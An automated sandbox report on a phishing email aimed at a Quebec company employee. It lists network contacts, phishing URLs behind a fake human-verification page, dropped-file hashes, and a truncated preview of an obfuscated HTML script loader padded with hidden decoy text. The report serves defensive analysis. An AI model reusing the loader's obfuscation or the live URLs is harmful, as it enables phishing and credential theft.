                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.catrue
                                                              unknown
                                                              https://cyt.sprenumen.ru/wJPIeL/#I#dlaurence.brochu@metalus.qc.cafalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                52.168.117.174
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                142.250.186.68
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                13.107.246.45
                                                                s-part-0017.t-0009.t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                95.101.149.131
                                                                unknownEuropean Union
                                                                20940AKAMAI-ASN1EUfalse
                                                                20.223.35.26
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                2.16.164.121
                                                                unknownEuropean Union
                                                                20940AKAMAI-ASN1EUfalse
                                                                88.221.110.176
                                                                unknownEuropean Union
                                                                20940AKAMAI-ASN1EUfalse
                                                                151.101.66.137
                                                                code.jquery.comUnited States
                                                                54113FASTLYUSfalse
                                                                35.190.80.1
                                                                a.nel.cloudflare.comUnited States
                                                                15169GOOGLEUSfalse
                                                                52.109.20.38
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                104.102.52.100
                                                                unknownUnited States
                                                                16625AKAMAI-ASUSfalse
                                                                1.1.1.1
                                                                unknownAustralia
                                                                13335CLOUDFLARENETUSfalse
                                                                13.89.179.14
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                74.125.133.84
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                52.109.68.130
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                69.49.245.172
                                                                web10.proUnited States
                                                                46606UNIFIEDLAYER-AS-1USfalse
                                                                104.18.95.41
                                                                challenges.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                63.140.62.17
                                                                microsoftwindows.112.2o7.netUnited States
                                                                15224OMNITUREUSfalse
                                                                216.58.206.46
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                13.107.253.72
                                                                s-part-0044.t-0009.fb-t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                2.19.126.151
                                                                unknownEuropean Union
                                                                16625AKAMAI-ASUSfalse
                                                                239.255.255.250
                                                                unknownReserved
                                                                unknownunknownfalse
                                                                188.114.97.3
                                                                cyt.sprenumen.ruEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                52.182.143.210
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                152.199.21.175
                                                                sni1gl.wpc.alphacdn.netUnited States
                                                                15133EDGECASTUSfalse
                                                                2.19.224.93
                                                                unknownEuropean Union
                                                                16625AKAMAI-ASUSfalse
                                                                52.109.76.243
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                104.17.25.14
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                2.18.64.214
                                                                unknownEuropean Union
                                                                6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                104.102.41.166
                                                                unknownUnited States
                                                                16625AKAMAI-ASUSfalse
                                                                104.18.94.41
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                95.101.148.110
                                                                unknownEuropean Union
                                                                20940AKAMAI-ASN1EUfalse
                                                                13.107.246.60
                                                                s-part-0032.t-0009.t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                104.17.200.204
                                                                noon.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.217.23.110
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                184.28.89.233
                                                                unknownUnited States
                                                                16625AKAMAI-ASUSfalse
                                                                142.250.186.131
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                151.101.194.137
                                                                unknownUnited States
                                                                54113FASTLYUSfalse
                                                                142.250.74.196
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.186.138
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                52.113.194.132
                                                                unknownUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                104.17.24.14
                                                                cdnjs.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                13.107.253.45
                                                                s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                142.250.181.227
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                20.190.159.4
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                20.190.159.2
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                92.122.18.57
                                                                aka.msEuropean Union
                                                                16625AKAMAI-ASUSfalse
                                                                188.114.96.3
                                                                xqe94soygyl0xmmn7oi0raibl6rn1ojg7he0qyjbvy1xxkrsv028hloblup.zentriva.suEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                20.103.156.88
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                88.221.110.129
                                                                unknownEuropean Union
                                                                20940AKAMAI-ASN1EUfalse
                                                                IP
                                                                192.168.2.16
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1528039
                                                                Start date and time:2024-10-07 14:34:49 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                Analysis Mode:stream
                                                                Analysis stop reason:Timeout
                                                                Sample name:original.eml
                                                                Detection:MAL
                                                                Classification:mal52.phis.winEML@42/103@74/390
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .eml
                                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.113.194.132, 52.109.76.243, 2.19.126.151, 2.19.126.160
                                                                • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, s-0005.s-msedge.net, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtSetValueKey calls found.
                                                                • VT rate limit hit for: original.eml
                                                                InputOutput
                                                                URL: Email Model: jbxai
                                                                {
                                                                "brand":["Metalus-Inc"],
                                                                "contains_trigger_text":true,
                                                                "trigger_text":"Avertissement: Ce courriel provient d'un expditeur externe. Ne cliquez sur aucun lien et n'ouvrez pas de pice jointe,
                                                                 sauf si vous l'expditeur et si le contenu est fiable",
                                                                "prominent_button_name":"unknown",
                                                                "text_input_field_labels":"unknown",
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "text":"Vous ne recevez pas souvent de courriers de besprechungsraum@pibsi.de. Dcouvrez pourquoi ceci est important  https://aka.ms/LearnAboutSenderIdentification ] Avertissement: Ce courriel provient d'un expditeur externe. Ne cliquez sur aucun lien et n'ouvrez pas de pice jointe,
                                                                 sauf si vous l'expditeur et si le contenu est fiable Laurence Brochu,
                                                                 CRHA Agente de recrutement et des mdias sociaux 819-475-3114 #268 Drummondville,
                                                                 QC [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logocarteMetalusBleuWhiteSmall.png] [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logofacebooksmall.png]<https://www.facebook.com/MetalusInc> [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logolinkedsmall.png] <https://ca.linkedin.com/company/m-talus> [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logoinstasmall.png] <https://www.instagram.com/metalusinc/>",
                                                                "has_visible_qrcode":false}
                                                                URL: https://cyt.sprenumen.ru/wJPIeL/#I#dlaurence.brochu@metalus.qc.ca Model: jbxai
                                                                {
                                                                "brand":["Cloudflare"],
                                                                "contains_trigger_text":true,
                                                                "trigger_text":"Verify its you",
                                                                "prominent_button_name":"unknown",
                                                                "text_input_field_labels":"unknown",
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":true,
                                                                "has_urgent_text":false,
                                                                "text":"Prove you are human by finishing the action below. Ensure your connection is secure before moving ahead.",
                                                                "has_visible_qrcode":false}
                                                                URL: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44 Model: jbxai
                                                                {
                                                                "brand":["Microsoft"],
                                                                "contains_trigger_text":false,
                                                                "trigger_text":"",
                                                                "prominent_button_name":"unknown",
                                                                "text_input_field_labels":"unknown",
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "text":"Protect yourself from phishing",
                                                                "has_visible_qrcode":false}
                                                                URL: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44 Model: jbxai
                                                                {
                                                                "brand":["Microsoft"],
                                                                "contains_trigger_text":false,
                                                                "trigger_text":"",
                                                                "prominent_button_name":"Learn to spot a phishing message",
                                                                "text_input_field_labels":"unknown",
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "text":"Protect yourself from phishing Phishing (pronounced: fishing) is an attack that attempts to steal your money,
                                                                 or your identity,
                                                                 by getting you to reveal personal information -- such as credit card numbers,
                                                                 bank information,
                                                                 or passwords -- on websites that pretend to be legitimate. Cybercriminals typically pretend to be reputable companies,
                                                                 friends,
                                                                 or acquaintances in a fake message,
                                                                 which contains a link to a phishing website. Select the headings below for more information Learn to spot a phishing message Phishing is a popular form of cybercrime because of how effective it is. Cybercriminals have been successful using emails,
                                                                 text messages,
                                                                 and direct messages on social media or in video games,
                                                                 to get people to respond with their personal information. The best defense is awareness and knowing what to look for. Here are some ways to recognize a phishing email: ",
                                                                "has_visible_qrcode":false}
                                                                URL: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44 Model: jbxai
                                                                {
                                                                "brand":["Microsoft"],
                                                                "contains_trigger_text":false,
                                                                "trigger_text":"",
                                                                "prominent_button_name":"Unlock now",
                                                                "text_input_field_labels":["Learn to spot a phishing message"],
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "text":"Protect yourself from phishing Phishing (pronounced: fishing) is an attack that attempts to steal your money,
                                                                 or your identity,
                                                                 by getting you to reveal personal information -- such as credit card numbers,
                                                                 bank information,
                                                                 or passwords -- on websites that pretend to be legitimate. Cybercriminals typically pretend to be reputable companies,
                                                                 friends,
                                                                 or acquaintances in a fake message,
                                                                 which contains a link to a phishing website. Phishing is a popular form of cybercrime because of how effective it is. Cybercriminals have been successful using emails,
                                                                 text messages,
                                                                 and direct messages on social media or in video games,
                                                                 to get people to respond with their personal information. The best defense is awareness and knowing what to look for. Here are some ways to recognize a phishing email: Productivity apps,
                                                                 1 TB of OneDrive,
                                                                 and advanced security",
                                                                "has_visible_qrcode":false}
                                                                URL: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44 Model: jbxai
                                                                "{
                                                                   \"brand\": [\"Microsoft\"],
                                                                   \"contains_trigger_text\": false,
                                                                   \"trigger_text\": \"\",
                                                                   \"prominent_button_name\": \"Learn to spot a phishing message\",
                                                                   \"text_input_field_labels\": [\"unknown\"],
                                                                   \"pdf_icon_visible\": false,
                                                                   \"has_visible_captcha\": false,
                                                                   \"has_urgent_text\": false,
                                                                   \"text\": \"Protect yourself from phishing Phishing (pronounced: fishing) is an attack that attempts to steal your money,
                                                                 or your identity,
                                                                 by getting you to reveal personal information -- such as credit card numbers,
                                                                 bank information,
                                                                 or passwords -- on websites that pretend to be legitimate. Cybercriminals typically pretend to be reputable companies,
                                                                 friends,
                                                                 or acquaintances in a fake message,
                                                                 which contains a link to a phishing website. Phishing is a popular form of cybercrime because of how effective it is. Cybercriminals have been successful using emails,
                                                                 text messages,
                                                                 and direct messages on social media or in video games,
                                                                 to get people to respond with their personal information. The best defense is awareness and knowing what to look for. Here are some ways to recognize a phishing email: Select the headings below for more information Learn to spot a phishing message Phishing is a popular form of cybercrime because of how effective it is. Cybercriminals have been successful using emails,
                                                                 text messages,
                                                                 and direct messages on social media or in video games,
                                                                 to get people to respond with their personal information. The best defense is awareness and knowing what to look for. Here are some ways to recognize a phishing email: Select the headings below for more information Learn to spot a phishing message Phishing is a popular form of cybercrime because of how effective it is. Cybercriminals have been successful using emails,
                                                                 text messages,
                                                                 and direct messages on social media or in video games,
                                                                 to get people to respond with their personal information. The best defense is awareness and knowing what to look for. Here are some ways to recognize a phishing email: Select the headings below for more information Learn to spot a phishing message Phishing is a popular form of cybercrime because of how effective it is. Cybercriminals have been successful using emails,
                                                                 text messages,
                                                                 and direct messages on social media or in video games,
                                                                 to get people to respond with their personal information. The best defense is awareness and knowing what to look for. Here are some ways to recognize a phishing email: Select the headings below for more information Learn to spot a phishing message Phishing is a popular form of cybercrime because of ho}
                                                                "
                                                                URL: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.ca Model: jbxai
                                                                {
                                                                "brand":["Cloudflare"],
                                                                "contains_trigger_text":true,
                                                                "trigger_text":"Verify you are human by finishing the task below.",
                                                                "prominent_button_name":"Verifying...",
                                                                "text_input_field_labels":["Ray ID: 4b7c5d3734556565"],
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":true,
                                                                "has_urgent_text":false,
                                                                "text":"Verify you are human by finishing the task below. Please review the security of your connection before continuing.",
                                                                "has_visible_qrcode":false}
                                                                URL: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44 Model: jbxai
                                                                {
                                                                "brand":["Microsoft"],
                                                                "contains_trigger_text":true,
                                                                "trigger_text":"Select the headings below for more information",
                                                                "prominent_button_name":"Unlock now",
                                                                "text_input_field_labels":"unknown",
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "text":"Protect yourself from phishing",
                                                                "has_visible_qrcode":false}
                                                                URL: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.ca Model: jbxai
                                                                {
                                                                "brand":["Cloudflare"],
                                                                "contains_trigger_text":true,
                                                                "trigger_text":"Verify you are human by finishing the task below.",
                                                                "prominent_button_name":"Success!",
                                                                "text_input_field_labels":"unknown",
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":true,
                                                                "has_urgent_text":false,
                                                                "text":"Verify you are human by finishing the task below. Please review the security of your connection before continuing.",
                                                                "has_visible_qrcode":false}
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):231348
                                                                Entropy (8bit):4.386575364782837
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F857DB56B3DC0D4C8C994F4F3420DD32
                                                                SHA1:9E806B53BC78F1D0B286D73EFA52A7969DFD1073
                                                                SHA-256:3DD867D2466F77823205E8E23A14BD10F45057A9D8125B603D43809BABE9F38C
                                                                SHA-512:B44C31D3D9E79EF7754F8F275DD6D290A750F1196A17BE333CD4199952A571BD8EB0C54BB3A95928227B499FFDDF8E3E24AF70D49FC3C117B3DDD13367BA7EC0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:TH02...... .p..S........SM01X...,....m.S............IPM.Activity...........h...............h............H..h.O............h.........y..H..h\cal ...pDat...h0...0...0.O....h7.A............h........_`Pk...h{.A.@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..7.......4...!h.............. h..DN....H.O...#h....8.........$h.y......8....."h8].......`....'h..V...........1h7.A.<.........0h....4....Uk../h....h.....UkH..h ...p....O...-h .......t.O...+h..A......O..... ........... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.u..Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):322260
                                                                Entropy (8bit):4.000299760592446
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CC90D669144261B198DEAD45AA266572
                                                                SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                                                SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                                                SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):10
                                                                Entropy (8bit):2.8464393446710154
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B3F33180301FE689C7F92A866E0FE52A
                                                                SHA1:3A1B9C487223D0C17ACE4D9D72FC17321833A880
                                                                SHA-256:763A8F4EE8F39C34793EACBEFF97A9C84280C9097F0BBB97C80217C54A9EF305
                                                                SHA-512:978798E45C1E7700414948C4850175D7C2865AC76AE1C603317F6BEFCE99A799BA2ECFF76E131400D8209655BC28F339316E6FA3FA884FC0C43F26D8C2DD1B9C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:1728304522
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):177810
                                                                Entropy (8bit):5.287203138856523
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AA64441A5AA5D6BAE04CEB63B5908724
                                                                SHA1:79EEB83D7549BED4923BFAF07298F91AB9407B6E
                                                                SHA-256:8F92C65D9118FAA48F7BB1A9ED428983167823A1CA215E19FD100523BD952820
                                                                SHA-512:4E50EBF3B05BA7DDA9056B68675C4F7B94C9BAB6E4B80A7FAEF0FB6E3A0A479E6D3172D7D7C76C5D9D1BDBA2CB1C0C33527F7B80954A4748167BFD294436A959
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-07T12:35:20">.. Build: 16.0.18124.40132-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):4096
                                                                Entropy (8bit):0.09304735440217722
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D0DE7DB24F7B0C0FE636B34E253F1562
                                                                SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
                                                                SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
                                                                SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):4616
                                                                Entropy (8bit):0.1384465837476566
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2F4FBE84A8FF859E4EBEF889A5F6871F
                                                                SHA1:6B66ADC8E4CC7EE693AF29D2B2CFACE7238B56F0
                                                                SHA-256:14159CF809F735F6D7799B8BF9C8D470014C9C0D332CFAB22E8F34C0405EEA67
                                                                SHA-512:8FA94B8E082EA400A42E55F062DB418F0103DC4DB729147FE33928891F6C50D311C1EAADD921996C3839AF5F8D28BD0827CEADBDD6BCA56FCD7791994F86B5FC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.... .c.....{Zb.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.0442941291783491
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:691C6A4549C036D76952D761DB8EA496
                                                                SHA1:D58DCE2EFA1170614899FA3B6FEDB1A59FFB2F0E
                                                                SHA-256:22FA74B5966C857FA753EA0E6C931D9E962033B1F071D1289A485B4A96CC9F63
                                                                SHA-512:B7A1C53C81212988090E7FB2ABA54A41375F0DDFAFBECF22B2A8F2FFA5718994BE891E4EC21B5D367183E6204E033CD298744CCEB19AFE89BC0BC9604B75F4AF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:..-........................}..Mm. ..m..|..9.....-........................}..Mm. ..m..|..9...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                Category:modified
                                                                Size (bytes):45352
                                                                Entropy (8bit):0.39302588926740517
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0EBE2B6D9A359AA16EB1A7320B236406
                                                                SHA1:CA26ABED92491F41A592FBE89C5B03925AACDBC6
                                                                SHA-256:046939B54388F1C3B752AD72A702E93789A2457B1D93DA789F448EBEBCD73353
                                                                SHA-512:4C76A0F0D9F2FB5EE726CB5EB451022FAEBC4AC5AB5E3027A111374CFFA2D7A932AB21BDD778B2C8B1F12C6D4A9FFF80BDFDA6B2C7500BB95DFD758339DD2814
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:7....-..........m. ..m........N.........m. ..m..........SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:CDFV2 Microsoft Outlook Message
                                                                Category:dropped
                                                                Size (bytes):38912
                                                                Entropy (8bit):4.083851488554596
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:568B511E47AA0A297FAB8588DAB5BC4F
                                                                SHA1:A0B44627605181DC946C4C666BC20FF2C520BECA
                                                                SHA-256:F69317CAB1BCC099B784FA33FD9C84C80F7ADE092B0C8F18A9942236754F75CA
                                                                SHA-512:82E204C96F7BAA7C0BB8EBC20C7D6404E4CB262800DD3526EF5E51887EAF557AC00ECD9BF34DE80314D1CA8F224812D93579034AC492B6D0939CF74EEDB997D8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................u................_._.p.r.o.p.e.r.t.i.e.s._.v.e.r.s.i.o.n.1...0...................0...................................................!..........._._.n.a.m.e.i.d._.v.e.r.s.i.o.n.1...0...........................(...........,.........................u......u................_._.s.u.b.s.t.g.1...0._.0.E.0.4.0.0.1.F.........................*.......................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:HTML document, ASCII text, with very long lines (3626), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5831
                                                                Entropy (8bit):3.8014142825741324
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DBF11C4CF891D0F05CBEF484A47ACEAD
                                                                SHA1:45BD6F679B44368C44EA7AAF461C952990126A50
                                                                SHA-256:9EFEC1FA5A614FA3B598C450B74BAAB96890E2E2C1289FD9E48D85C8057FFE88
                                                                SHA-512:2C238E9F3EAA08C64580DD617A7B981C950AAF07DDB138300CB5FFDB30EAD897178A74280C0768D3491639537733D4D21CEAEDD024C28A4676B79816E80B38C4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<html> <strong> She sewed a dress for the upcoming event. </strong> --><script>..</script>..<span style='display:none;'> The musician performed at the local cafe. </span> ..<script>..kelp = `#dlaurence.brochu@metalus.qc.ca`;..</script>..<strong style='display:none;'> The dog wagged its tail excitedly. </strong>..<script>.. /* koala */ giraffe /* tulip */=['w', 'ri','te'].join('') /* jackfruit */;..</script>.. <b> She explored the old, abandoned house. </b> -->..<script> upupa =['<s','cri','pt s','rc='].join('') /* acacia */;..</script>..<h1 style='display:none;'> She sang a lullaby to help the baby sleep. </h1>..<script></script>.. <b> The family went on a camping trip in the woods. </b> -->..<script>..function durian(jaguar) {.. /* She knitted a warm scarf for the winter season.
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:HTML document, ASCII text, with very long lines (3626), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):0
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DBF11C4CF891D0F05CBEF484A47ACEAD
                                                                SHA1:45BD6F679B44368C44EA7AAF461C952990126A50
                                                                SHA-256:9EFEC1FA5A614FA3B598C450B74BAAB96890E2E2C1289FD9E48D85C8057FFE88
                                                                SHA-512:2C238E9F3EAA08C64580DD617A7B981C950AAF07DDB138300CB5FFDB30EAD897178A74280C0768D3491639537733D4D21CEAEDD024C28A4676B79816E80B38C4
                                                                Malicious:false
                                                                Reputation:unknown
